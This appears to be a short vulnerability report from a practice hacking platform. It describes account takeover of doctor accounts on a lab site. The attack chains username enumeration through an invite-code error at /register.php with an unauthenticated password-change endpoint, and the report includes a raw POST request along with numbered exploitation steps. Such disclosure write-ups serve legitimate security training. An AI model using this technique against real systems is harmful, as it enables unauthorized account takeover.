Summary

When looking at the Source Code of /drpanel/index.php# i found an Interesting Comment

So i tried it to change password of any user and it worked

Details

From the comments I got some idea about the Request

Request Path : /drpanel/drapi/editpassword.php
Request Method : POST
Content-Type: application/x-www-form-urlencoded
body : username=

So the only data required to change the password of a doctor was his username. Thankfully firstblood has a user enumeration bug in the /register.php

If a username previously registered with firstblood is used with inviteCode test it will lead to an error "This invite code is not valid.". We can use this Information to enumerate usernames

Steps

1. Use the Intruder at /register.php to enumerate Usernames

2. After that Send this Request with Usernames's You enumerated

   
   POST /drpanel/drapi/editpassword.php HTTP/1.1
   Host: 8ef80def9df5-0xirfan.a.firstbloodhackers.com
   Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
   Sec-Ch-Ua-Mobile: ?0
   Sec-Ch-Ua-Platform: "Windows"
   Upgrade-Insecure-Requests: 1
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
   Sec-Fetch-Site: none
   Sec-Fetch-Mode: navigate
   Sec-Fetch-User: ?1
   Sec-Fetch-Dest: document
   Content-Type: application/x-www-form-urlencoded
   Accept-Encoding: gzip, deflate
   Accept-Language: en-US,en;q=0.9
   Connection: close
   Content-Length: 14
   
   username=

3.Login with the username and updated password

Impact

Doctor ATO